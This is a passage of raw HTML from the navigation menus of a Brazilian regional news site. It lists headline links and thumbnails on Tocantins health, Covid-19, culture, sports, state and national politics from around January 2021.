loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-tocantins-estado-do-tocantins-25-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-tocantins-estado-do-tocantins-25-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Acontece hoje (4), a posse da jornalista Marimar Aiala na Diretoria de Comunicação da Câmara de Palmas</p></a></li></ul></div></div>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/saude/">Saúde</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/servico-de-urologia-do-hospital-geral-de-palmas-tem-artigo-publicado-em-congresso-internacional/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/08/porto-nacional-palmas-gurupi-araguaina-paraiso-tocantins-g1-tocantins-255-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/08/porto-nacional-palmas-gurupi-araguaina-paraiso-tocantins-g1-tocantins-255-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/08/porto-nacional-palmas-gurupi-araguaina-paraiso-tocantins-g1-tocantins-255-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Serviço de urologia do Hospital Geral de Palmas tem artigo publicado em Congresso Internacional</p></a></li><li><a href="https://folhadotocantins.com.br/hospital-geral-de-palmas-e-referencia-em-conhecimento-e-qualificacao-profissional-na-area-da-saude/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/08/porto-nacional-palmas-gurupi-araguaina-paraiso-tocantins-g1-tocantins-246-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/08/porto-nacional-palmas-gurupi-araguaina-paraiso-tocantins-g1-tocantins-246-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/08/porto-nacional-palmas-gurupi-araguaina-paraiso-tocantins-g1-tocantins-246-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Hospital Geral de Palmas é referência em conhecimento e qualificação profissional na área da saúde</p></a></li><li><a href="https://folhadotocantins.com.br/estado-incentiva-participacao-de-pesquisadores-em-projetos-que-visem-o-combate-a-covid-19/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/08/porto-nacional-palmas-gurupi-araguaina-paraiso-tocantins-g1-tocantins-205-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/08/porto-nacional-palmas-gurupi-araguaina-paraiso-tocantins-g1-tocantins-205-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/08/porto-nacional-palmas-gurupi-araguaina-paraiso-tocantins-g1-tocantins-205-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Estado incentiva participação de pesquisadores em projetos que visem o combate à Covid-19</p></a></li><li><a href="https://folhadotocantins.com.br/tocantins-tem-26-casos-confirmados-de-covid-19/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/04/montagem_palmas_tocantins_coronavirus-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/04/montagem_palmas_tocantins_coronavirus-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/04/montagem_palmas_tocantins_coronavirus-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Tocantins tem 26 casos confirmados de Covid-19</p></a></li><li><a href="https://folhadotocantins.com.br/prefeitura-de-gurupi-informa-que-nao-ha-casos-confirmados-da-covid-19/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/03/777-376-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/03/777-376-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/03/777-376-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Prefeitura de Gurupi informa que não há casos confirmados da Covid-19</p></a></li></ul></div></div></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/cultura/">Cultura</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/32413-2/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/08/palmas-tocantins-araguaina-xambioa-paraiso-porto-nacional-59-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/08/palmas-tocantins-araguaina-xambioa-paraiso-porto-nacional-59-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/08/palmas-tocantins-araguaina-xambioa-paraiso-porto-nacional-59-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Igualdade racial ainda é um desafio nas instituições</p></a></li><li><a href="https://folhadotocantins.com.br/numero-de-casos-de-covid-19-sobe-para-7-910-mortes-chegam-a-299/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/04/tocantins-palmas-governo-do-tocantins-20-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/04/tocantins-palmas-governo-do-tocantins-20-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/04/tocantins-palmas-governo-do-tocantins-20-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Número de casos de covid-19 sobe para 7.910; mortes chegam a 299</p></a></li><li><a href="https://folhadotocantins.com.br/secult-participa-de-reuniao-para-tratar-da-seguranca-durante-o-carnaval-de-gurupi-2020/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/02/777-62-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/02/777-62-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/02/777-62-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Secult participa de reunião para tratar da segurança durante o carnaval de Gurupi 2020</p></a></li><li><a href="https://folhadotocantins.com.br/bale-popular-abre-periodo-de-inscricao-para-estudantes-interessados-em-ingressar-na-companhia/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/02/777-58-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/02/777-58-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/02/777-58-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Balé Popular abre período de inscrição para estudantes interessados em ingressar na companhia</p></a></li><li><a href="https://folhadotocantins.com.br/com-tres-premios-no-globo-de-ouro-era-uma-vez-em-hollywood-sera-exibido-no-cine-cultura/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/01/777-37-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/01/777-37-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/01/777-37-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Com três prêmios no Globo de Ouro, ‘Era Uma Vez Em&#8230; Hollywood’ será exibido no Cine Cultura</p></a></li></ul></div></div></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-56 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/esporte/">Esporte</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/patinadora-tocantinense-fica-entre-as-quatro-primeiras-colocadas-em-campeonatos-na-europa/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2020/02/777-43-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2020/02/777-43-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2020/02/777-43-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Patinadora tocantinense fica entre as quatro primeiras colocadas em campeonatos na Europa</p></a></li><li><a href="https://folhadotocantins.com.br/meia-maratona-do-tocantins-contara-com-afericao-oficial-do-trajeto-pela-cbat/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2019/09/ultimas-noticias-de-tocantins-12-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2019/09/ultimas-noticias-de-tocantins-12-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2019/09/ultimas-noticias-de-tocantins-12-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Meia Maratona do Tocantins contará com aferição oficial do trajeto pela CBAt</p></a></li><li><a href="https://folhadotocantins.com.br/meia-maratona-do-tocantins-traz-novas-provas-e-categorias-para-edicao-de-2019/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2019/09/ultimas-noticias-de-tocantins-9-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2019/09/ultimas-noticias-de-tocantins-9-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2019/09/ultimas-noticias-de-tocantins-9-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Meia Maratona do Tocantins traz novas provas e categorias para edição de 2019</p></a></li><li><a href="https://folhadotocantins.com.br/circuito-mountain-bike-tocantins-2019-libera-ranking-da-prova/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2019/09/gurupi-tocantins-26-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2019/09/gurupi-tocantins-26-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2019/09/gurupi-tocantins-26-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Circuito Mountain Bike Tocantins 2019, libera ranking da prova</p></a></li><li><a href="https://folhadotocantins.com.br/esporte-para-todos-escolinhas-de-futebol-recebem-kits-esportivos-em-gurupi/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2019/09/tocantins-13-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2019/09/tocantins-13-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2019/09/tocantins-13-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Esporte para todos: Escolinhas de futebol recebem kits esportivos em Gurupi</p></a></li></ul></div></div></li>
</ul>
</li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-47 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/cidades/">Cidades</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/a-violencia-fisica-contra-a-mulher-nao-acontece-isoladamente-e-precisa-ser-denunciada/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-168-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-168-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-168-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>A violência física contra a mulher não acontece isoladamente e precisa ser denunciada</p></a></li><li><a href="https://folhadotocantins.com.br/165497-2/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-167-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-167-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-167-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Secretaria de Saúde de Gurupi entrega vacinas contra Covid-19 ao HRG</p></a></li><li><a href="https://folhadotocantins.com.br/oab-to-anuidade-zero-31-mil-advogados-e-advogadas-aderem-programa-e-terao-desconto-em-2021/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-163-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>OAB/TO: Anuidade Zero: 3,1 mil advogados e advogadas aderem programa e terão desconto em 2021</p></a></li><li><a href="https://folhadotocantins.com.br/pandemia-prejuizos-emocionais-serao-evitados-com-volta-das-aulas-presenciaisopinam-educadores/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-162-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-162-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-162-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>PANDEMIA: Prejuízos emocionais serão evitados com volta das aulas presenciais,opinam educadores</p></a></li><li><a href="https://folhadotocantins.com.br/em-mateiros-dimbarre-assume-sedematur-e-destaca-objetivos-para-desenvolvimento-do-turismo/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-161-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-161-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-161-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>EM MATEIROS: Dimbarre assume Sedematur e destaca objetivos para desenvolvimento do Turismo</p></a></li></ul></div></div></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-44 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/estado/">Estado</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/governador-carlesse-recebe-jogador-pentacampeao-edmilson-moraes-e-coloca-tocantins-a-disposicao-de-projetos-esportivos-e-sociais/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-160-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-160-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-160-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Governador Carlesse recebe jogador pentacampeão Edmílson Moraes e coloca Tocantins à disposição de projetos esportivos e sociais</p></a></li><li><a href="https://folhadotocantins.com.br/vagas-para-medico-psicologo-farmaceutico-e-biomedico-sao-ofertadas-em-17-cidades/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-143-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-143-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-143-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Vagas para médico, psicólogo, farmacêutico e biomédico são ofertadas em 17 cidades</p></a></li><li><a href="https://folhadotocantins.com.br/presidente-do-tjto-desembargador-helvecio-maia-neto-supera-a-covid-19-e-recebe-alta-do-hospital-sirio-libanes/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-138-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-138-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-138-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Presidente do TJTO, desembargador Helvécio Maia Neto supera a Covid-19 e recebe alta do Hospital Sírio Libanês</p></a></li><li><a href="https://folhadotocantins.com.br/coren-to-defende-prioridade-na-vacinacao-dos-profissionais-da-saude/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-77-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-77-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-77-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Coren-TO defende prioridade na vacinação dos profissionais da saúde</p></a></li><li><a href="https://folhadotocantins.com.br/2021777-2/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-65-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-65-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-65-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Covid 19: De Guarulhos (SP), Carlesse anuncia a vacinação do 1º tocantinense às (17h)</p></a></li></ul></div></div></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/brasil/">Brasil</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/supremo-bolsonaro-podera-indicar-mais-um-ministro-para-o-stf-em-2021/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-166-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-166-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-166-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Supremo: Bolsonaro poderá indicar mais um ministro para o STF em 2021</p></a></li><li><a href="https://folhadotocantins.com.br/senadores-comemoram-posse-de-joe-biden-e-elogiam-tom-de-uniao-do-discurso/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-149-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-149-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-149-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Senadores comemoram posse de Joe Biden e elogiam tom de união do discurso</p></a></li><li><a href="https://folhadotocantins.com.br/tarifa-de-importacao-de-pneus-para-transporte-de-cargas-e-zerada/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-147-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-147-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-147-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Tarifa de importação de pneus para transporte de cargas é zerada</p></a></li><li><a href="https://folhadotocantins.com.br/covid-19-ministros-e-embaixador-chines-discutem-envio-de-insumos/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-146-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-146-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-146-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Covid-19: ministros e embaixador chinês discutem envio de insumos</p></a></li><li><a href="https://folhadotocantins.com.br/bolsonaro-cumprimenta-biden-e-divulga-carta-enviada-ao-novo-presidente/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-145-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-145-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-145-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Bolsonaro cumprimenta Biden e divulga carta enviada ao novo presidente</p></a></li></ul></div></div></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-45 mvp-mega-dropdown"><a href="https://folhadotocantins.com.br/politica/">Política</a><div class="mvp-mega-dropdown"><div class="mvp-main-box"><ul class="mvp-mega-list"><li><a href="https://folhadotocantins.com.br/175177-2/"><div class="mvp-mega-img"><img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-169-400x240.jpg" class="attachment-mvp-mid-thumb size-mvp-mid-thumb wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-169-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-169-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" /></div><p>Governo do Tocantins presta assistência no pouso técnico, em Palmas, de avião que transportava pacientes com covid-19 oriundos de Manaus</p></a></li><li><a href="https://folhadotocantins.com.br/criada-em-2009-capsula-do-tempo-da-defensoria-sera-aberta-nesta-sexta-feira-22/"><div class="mvp-mega-img"><img width="400" height="240" 